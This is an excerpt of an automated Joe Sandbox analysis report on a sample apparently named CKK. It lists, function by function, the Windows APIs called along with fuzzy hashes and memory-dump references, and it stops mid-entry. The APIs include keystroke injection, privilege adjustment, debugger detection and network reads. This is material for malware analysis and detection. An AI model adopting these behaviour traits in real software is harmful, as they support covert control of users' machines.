                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 1601658205-0
                                          • Opcode ID: f4996a1eca3ff34f356ac2be4f6ac43b42c422a45d01fbbf01928fc6e9082fff
                                          • Instruction ID: b5783655b5d5dd336b8adc63228a01c7edf4873f55daa6c4781a9d80b1151601
                                          • Opcode Fuzzy Hash: f4996a1eca3ff34f356ac2be4f6ac43b42c422a45d01fbbf01928fc6e9082fff
                                          • Instruction Fuzzy Hash: 6251E071A00200AFDB10AF24D986F2AB7E5AB45718F18948CF9057F383C771AD42CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                          • API String ID: 0-1546025612
                                          • Opcode ID: 688611b9938f8d8cfb817c40f6345a22bc7d83e6869e7e19ae9150cbacae0f63
                                          • Instruction ID: f0e7da436bc44c66b1d1775b697bfc4a048daea386c54bd7bbe5877b18365af5
                                          • Opcode Fuzzy Hash: 688611b9938f8d8cfb817c40f6345a22bc7d83e6869e7e19ae9150cbacae0f63
                                          • Instruction Fuzzy Hash: C0A28C71A0021ACBDF24DF58D9407EEB7B1BB54318F2491AAE81DB7285EB749D81CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID: (
                                          • API String ID: 1703294689-2063206799
                                          • Opcode ID: b5860e9e460eb4ceea710090459c600ffbc555e125f38bdedb824db3c44d2c11
                                          • Instruction ID: 4134db315a9462d3e302e5a3d5ab8be46796b55628e27341bbf3d3b8cd90d96b
                                          • Opcode Fuzzy Hash: b5860e9e460eb4ceea710090459c600ffbc555e125f38bdedb824db3c44d2c11
                                          • Instruction Fuzzy Hash: 91E0B6B1441149AFCF11AF65FD09A583B69EB417C5F209055FC09AB162CB35DD46DA80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00ECA6AC
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00ECA6BA
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00ECA79C
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECA7AB
                                            • Part of subcall function 00E5CE60: CompareStringW.KERNEL32 ref: 00E5CE8A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                          • String ID:
                                          • API String ID: 1991900642-0
                                          • Opcode ID: 86689b44a962f8330796e0dbfe5574bf197d1120d9ceb25920ee88e861701031
                                          • Instruction ID: 78e3bbbdce3cd18381c443bedbadbf74291c25bc87c9c8e9f877c29257eb3706
                                          • Opcode Fuzzy Hash: 86689b44a962f8330796e0dbfe5574bf197d1120d9ceb25920ee88e861701031
                                          • Instruction Fuzzy Hash: A3517B71508300AFD314EF24D886E6BBBE8FF89754F04592DF985A7262EB31D905CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00EAAAAC
                                          • SetKeyboardState.USER32(00000080), ref: 00EAAAC8
                                          • PostMessageW.USER32 ref: 00EAAB36
                                          • SendInput.USER32(00000001,?,0000001C), ref: 00EAAB88
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 5a9c2462101e06a0ae1594722ff01e83c2344e1124dba40515f6a2633883d44c
                                          • Instruction ID: 2d8f3c3ecfad7c31784d8087dade4d7c92fd67736f94431bb4c98fc56a59922c
                                          • Opcode Fuzzy Hash: 5a9c2462101e06a0ae1594722ff01e83c2344e1124dba40515f6a2633883d44c
                                          • Instruction Fuzzy Hash: 83312B30A40308AEEB308A65CC05BFA77E6AB4E314F18622AE0817A1D1D374A985C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00EBCE89
                                          • GetLastError.KERNEL32 ref: 00EBCEEA
                                          • SetEvent.KERNEL32 ref: 00EBCEFE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorEventFileInternetLastRead
                                          • String ID:
                                          • API String ID: 234945975-0
                                          • Opcode ID: 4a311c68a04f32f3305159b6fa8630cd0b236a57b5d21a865057a4eabdbb65e9
                                          • Instruction ID: 604334c2866849024459bec55f17169701b04b29556e9b6a7e0d2b70db844d2b
                                          • Opcode Fuzzy Hash: 4a311c68a04f32f3305159b6fa8630cd0b236a57b5d21a865057a4eabdbb65e9
                                          • Instruction Fuzzy Hash: 7D21AC71608706DFDB209FA5E948BA777F8EB00358F20541AE646E2151E770EA08CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: c42473130eb4d541fc7d77bcd6af4d1fa4c3bc116e471ce00b5f8c73e54cb07a
                                          • Instruction ID: a4323a4e47fdb3d6ebcc9c043bafdae6fcd56d01f9ed86c09140408016711286
                                          • Opcode Fuzzy Hash: c42473130eb4d541fc7d77bcd6af4d1fa4c3bc116e471ce00b5f8c73e54cb07a
                                          • Instruction Fuzzy Hash: CA323574A007059FCB28CF59C581AAAB7F0FF48714B15D56EE49AEB3A1EB70E941CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 00E7271A
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00E72724
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00E72731
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 54fd4f21b4f81ae6a2d426225aa8dcc6de1ea72e5210a0badfffee44c5461969
                                          • Instruction ID: c5c1d3c0dd03271da6c693d085602d89b81c3d34c122a858ffbc33d01a3db0fe
                                          • Opcode Fuzzy Hash: 54fd4f21b4f81ae6a2d426225aa8dcc6de1ea72e5210a0badfffee44c5461969
                                          • Instruction Fuzzy Hash: 7C31D574D5122D9BCB21DF68DD8879DB7B8AF08350F5052EAE91CA7260E7309F858F44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EB51DA
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EB5238
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB52A1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: 26b6c16d751b8bee3c797ba98abdf866d9a36a3524e3462942f80fbf32e2d7c1
                                          • Instruction ID: f4924257ee179838f7c612a5fe09ec43a6d601e6c709565d2b84f9870286c2b1
                                          • Opcode Fuzzy Hash: 26b6c16d751b8bee3c797ba98abdf866d9a36a3524e3462942f80fbf32e2d7c1
                                          • Instruction Fuzzy Hash: 9D316B35A00518DFDB00DF54D884EAEBBF4FF09318F188099E805AB362CB35E84ACB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E5FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E60668
                                            • Part of subcall function 00E5FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E60685
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EA170D
                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00EA173A
                                          • GetLastError.KERNEL32 ref: 00EA174A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                          • String ID:
                                          • API String ID: 577356006-0
                                          • Opcode ID: 127a04a02964556e068a0e3a2fddfe0c9185908788d7d12f13ce31f7538e7066
                                          • Instruction ID: 8038ef606234dc1b52faec3812050c316e9181108154f33cfd3d4bca9287e245
                                          • Opcode Fuzzy Hash: 127a04a02964556e068a0e3a2fddfe0c9185908788d7d12f13ce31f7538e7066
                                          • Instruction Fuzzy Hash: A31101B2400305AFD7189F54EC86E6AB7F8EB09754B20856EF446A7241EB70BC45CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EAD608
                                          • DeviceIoControl.KERNEL32 ref: 00EAD645
                                          • CloseHandle.KERNEL32(?), ref: 00EAD650
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle
                                          • String ID:
                                          • API String ID: 33631002-0
                                          • Opcode ID: 2a077ebed2c4fa12a5f73b5384bd9e3711aeb6d98e78a61ca2c26c6f3db14f91
                                          • Instruction ID: 0da9eaed6b0fcae0cc36905c788bf1643e9f474e1db81ce83e2d5757476e2500
                                          • Opcode Fuzzy Hash: 2a077ebed2c4fa12a5f73b5384bd9e3711aeb6d98e78a61ca2c26c6f3db14f91
                                          • Instruction Fuzzy Hash: 39118EB1E05228BFDB108F95EC44FAFBBBCEB49B50F108152F904F7290C2705A058BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32 ref: 00EA168C
                                          • CheckTokenMembership.ADVAPI32 ref: 00EA16A1
                                          • FreeSid.ADVAPI32(?), ref: 00EA16B1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 5dbb4ad850b4aef1ba3818db497cb15726fe71f75ae37a5bfd20f1b8d85922af
                                          • Instruction ID: 2b7d307d7313f5549cb8882c87bef58c4204d0e4dddeee5cede7daeb92e2e947
                                          • Opcode Fuzzy Hash: 5dbb4ad850b4aef1ba3818db497cb15726fe71f75ae37a5bfd20f1b8d85922af
                                          • Instruction Fuzzy Hash: 92F0F471951309FFDF00DFE59C89AAEBBBCEB08644F5045A5E501E2181E774AA489A50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /
                                          • API String ID: 0-2043925204
                                          • Opcode ID: 561bdaf90c47cd2f9675434f6d0b6d60b7e066e40315193f09fd5e535feb8bda
                                          • Instruction ID: 288e1503de583aee8c9262c994d069ec2df7083c012322ee2ac499d1be08a592
                                          • Opcode Fuzzy Hash: 561bdaf90c47cd2f9675434f6d0b6d60b7e066e40315193f09fd5e535feb8bda
                                          • Instruction Fuzzy Hash: 2A413A725006197FCB209FB9DC48DAB77BCEB84358F2092ADF919E7180E6309D41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E9D28C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID: X64
                                          • API String ID: 2645101109-893830106
                                          • Opcode ID: 127c0c3e2e492691856ebedaf245c628a6d0ca614bd562e6ee2c1ea1621d90e0
                                          • Instruction ID: 69e81a45222168db081b3cce7d3a7c486d2f104dfd537e7d85ea7d160790bab5
                                          • Opcode Fuzzy Hash: 127c0c3e2e492691856ebedaf245c628a6d0ca614bd562e6ee2c1ea1621d90e0
                                          • Instruction Fuzzy Hash: 48D0C9B480512DEECF90CB90EC88DD9B37CFB04345F100552F506B2080D73095488F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                          • Instruction ID: f745cfb2b28293938f5a0d7ca4c6ebeac9b6fe71a102a0967cc08f798c8dd093
                                          • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                          • Instruction Fuzzy Hash: 2F023B71E402199BDF14CFA9D8806ADFBF1EF88354F25916AD859FB380D731AA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EB6918
                                          • FindClose.KERNEL32(00000000), ref: 00EB6961
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: be000ff2110ff5b5e99c25d3c4690137ea75d5167baecfd13597eb7bf1aeb489
                                          • Instruction ID: af807acd4400e3ac72f522a9ed71dcc7d5735fcdecb7c4dc90e5a09430fe4113
                                          • Opcode Fuzzy Hash: be000ff2110ff5b5e99c25d3c4690137ea75d5167baecfd13597eb7bf1aeb489
                                          • Instruction Fuzzy Hash: 9B11E2316046019FC710CF29D484A16BBE1FF84328F14C699F8699F7A2C734EC05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: bcb37172e9eaea9b52ff33dce189676370754b763500dbecb73dba15d283f60f
                                          • Instruction ID: 584da97fcfaef2656eecd55635d0db2d2e61d23699d3bfb2fcdd126aa33abf65
                                          • Opcode Fuzzy Hash: bcb37172e9eaea9b52ff33dce189676370754b763500dbecb73dba15d283f60f
                                          • Instruction Fuzzy Hash: 60F0EC707052356AD71017B66C4DFDB779DEFC4761F100166F509F2191D9605904C7B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendInput.USER32(00000001,?,0000001C), ref: 00EAB25D
                                          • keybd_event.USER32 ref: 00EAB270
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: InputSendkeybd_event
                                          • String ID:
                                          • API String ID: 3536248340-0
                                          • Opcode ID: 131b2d1f9c689ffc3f1755cefac5018edd2efba88b509b9a8f17a2654ab7ae37
                                          • Instruction ID: f100df0233d6cb4157fc50c658961a1c90523dd702393bc27f4870fa254b78ab
                                          • Opcode Fuzzy Hash: 131b2d1f9c689ffc3f1755cefac5018edd2efba88b509b9a8f17a2654ab7ae37
                                          • Instruction Fuzzy Hash: D9F06D7080424EAFDB058FA1D805BEE7BB4FF08309F10804AF951A91A2C3799205DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00EA10D4
                                          • CloseHandle.KERNEL32(?), ref: 00EA10E9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 4f1a1be73be673c7cc6b5be835f4cc651c876a44ed645dd660d5cedae5983146
                                          • Instruction ID: 0d29c5fde237f6591117c915852a5adc3110294861df175df5346124028f6932
                                          • Opcode Fuzzy Hash: 4f1a1be73be673c7cc6b5be835f4cc651c876a44ed645dd660d5cedae5983146
                                          • Instruction Fuzzy Hash: 04E04F32008601AEE7252B11FC06F7377E9EB04321F20882EF9A5904B1DB626C94DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Variable is not of type 'Object'., xrefs: 00E90C40
                                          Memory Dump Source
